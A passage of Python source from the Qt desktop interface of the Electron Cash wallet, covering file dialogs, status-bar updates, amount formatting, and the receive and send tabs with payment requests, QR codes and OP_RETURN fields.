self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
c, u, x = self.wallet.get_balance()
text_items = [
_("Balance: {amount_and_unit}").format(
amount_and_unit=self.format_amount_and_units(c))
]
if u:
text_items.append(_("[{amount} unconfirmed]").format(
amount=self.format_amount(u, True).strip()))
if x:
text_items.append(_("[{amount} unmatured]").format(
amount=self.format_amount(x, True).strip()))
extra = run_hook("balance_label_extra", self)
if isinstance(extra, str) and extra:
text_items.append(_("[{extra}]").format(extra=extra))
# append fiat balance and price
if self.fx.is_enabled():
fiat_text = self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()).strip()
if fiat_text:
text_items.append(fiat_text)
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text_items.append(_("[{count} unverified TXs]").format(count=n_unverif))
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
text = ' '.join(text_items)
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon(icon)
self.status_button.setStatusTip( status_tip )
run_hook('window_update_status', self)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.gui_object.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
# Cash Account for this address (if any)
msg = _("The Cash Account (if any) associated with this address. It doesn't get saved with the request, but it is shown here for your convenience.\n\nYou may use the Cash Accounts button to register a new Cash Account for this address.")
label = HelpLabel(_('Cash Accoun&t'), msg)
class CashAcctE(ButtonsLineEdit):
my_network_signal = pyqtSignal(str, object)
''' Inner class encapsulating the Cash Account Edit.s
Note:
- `slf` in this class is this instance.
- `self` is wrapping class instance. '''
def __init__(slf, *args):
super().__init__(*args)
slf.font_default_size = slf.font().pointSize()
icon = ":icons/cashacct-button-darkmode.png" if ColorScheme.dark_scheme else ":icons/cashacct-logo.png"
slf.ca_but = slf.addButton(icon, self.register_new_cash_account, _("Register a new Cash Account for this address"))
slf.ca_copy_b = slf.addCopyButton()
slf.setReadOnly(True)
slf.info = None
slf.cleaned_up = False
self.network_signal.connect(slf.on_network_qt)
slf.my_network_signal.connect(slf.on_network_qt)
if self.wallet.network:
self.wallet.network.register_callback(slf.on_network, ['ca_updated_minimal_chash'])
def clean_up(slf):
slf.cleaned_up = True
try: self.network_signal.disconnect(slf.on_network_qt) # need to disconnect parent signals due to PyQt bugs, see #1531
except TypeError: pass
if self.wallet.network:
self.wallet.network.unregister_callback(slf.on_network)
def set_cash_acct(slf, info: cashacct.Info = None, minimal_chash = None):
if not info and self.receive_address:
minimal_chash = None
ca_list = self.wallet.cashacct.get_cashaccounts(domain=[self.receive_address])
ca_list.sort(key=lambda x: ((x.number or 0), str(x.collision_hash)))
info = self.wallet.cashacct.get_address_default(ca_list)
if info:
slf.ca_copy_b.setDisabled(False)
f = slf.font(); f.setItalic(False); f.setPointSize(slf.font_default_size); slf.setFont(f)
slf.setText(info.emoji + " " + self.wallet.cashacct.fmt_info(info, minimal_chash=minimal_chash))
else:
slf.setText(pgettext("Referencing CashAccount", "None"))
f = slf.font(); f.setItalic(True); f.setPointSize(slf.font_default_size-1); slf.setFont(f)
slf.ca_copy_b.setDisabled(True)
slf.info = info
def on_copy(slf):
''' overrides super class '''
QApplication.instance().clipboard().setText(slf.text()[3:] + ' ' + slf.text()[:1]) # cut off the leading emoji, and add it to the end
QToolTip.showText(QCursor.pos(), _("Cash Account copied to clipboard"), slf)
def on_network_qt(slf, event, args=None):
''' pick up cash account changes and update receive tab. Called
from GUI thread. '''
if not args or self.cleaned_up or slf.cleaned_up or args[0] != self.wallet.cashacct:
return
if event == 'ca_verified_tx' and self.receive_address and self.receive_address == args[1].address:
slf.set_cash_acct()
elif event == 'ca_updated_minimal_chash' and slf.info and slf.info.address == args[1].address:
slf.set_cash_acct()
def on_network(slf, event, *args):
if event == 'ca_updated_minimal_chash' and args[0] == self.wallet.cashacct:
slf.my_network_signal.emit(event, args)
def showEvent(slf, e):
super().showEvent(e)
if e.isAccepted():
slf.set_cash_acct()
self.cash_account_e = CashAcctE()
label.setBuddy(self.cash_account_e)
grid.addWidget(label, 1, 0)
grid.addWidget(self.cash_account_e, 1, 1, 1, -1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
label = QLabel(_('Requested &amount'))
label.setBuddy(self.receive_amount_e)
grid.addWidget(label, 4, 0)
grid.addWidget(self.receive_amount_e, 4, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 4, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 5, 0)
grid.addWidget(self.expires_combo, 5, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 5, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(slf, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 6, 2, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(slf, e):
super().showEvent(e)
if e.isAccepted():
wslf = weakSelf()
if wslf:
wslf.check_and_reset_receive_address_if_needed()
w = ReceiveTab()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e) or repr(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
try:
pr = paymentrequest.serialize_request(r).SerializeToString()
except ValueError as e:
''' User entered some large amount or other value that doesn't fit
into a C++ type. See #1738. '''
self.show_error(str(e))
return
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
self.cash_account_e.set_cash_acct()
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# creae a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
if not self.receive_address:
return
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
else:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
# NB: the translators hopefully will not have too tough a time with this
# *fingers crossed* :)
msg = "<span style=\"font-weight:400;\">" + _('Recipient of the funds.') + " " + \
_("You may enter:"
"<ul>"
"<li> Bitcoin Cash <b>Address</b> <b>★</b>"
"<li> Bitcoin Legacy <b>Address</b> <b>★</b>"
"<li> <b>Cash Account</b> <b>★</b> e.g. <i>satoshi#123</i>"
"<li> <b>Contact name</b> <b>★</b> from the Contacts tab"
"<li> <b>OpenAlias</b> e.g. <i>satoshi@domain.com</i>"
"</ul><br>"
" <b>★</b> = Supports <b>pay-to-many</b>, where"
" you may optionally enter multiple lines of the form:"
"</span><br><pre>"
" recipient1, amount1 \n"
" recipient2, amount2 \n"
" etc..."
"</pre>")
self.payto_label = payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
qmark = ":icons/question-mark-dark.svg" if ColorScheme.dark_scheme else ":icons/question-mark-light.svg"
qmark_help_but = HelpButton(msg, button_text='', fixed_size=False, icon=QIcon(qmark), custom_parent=self)
self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3 , 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('&Amount'), msg)
amount_label.setBuddy(self.amount_e)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
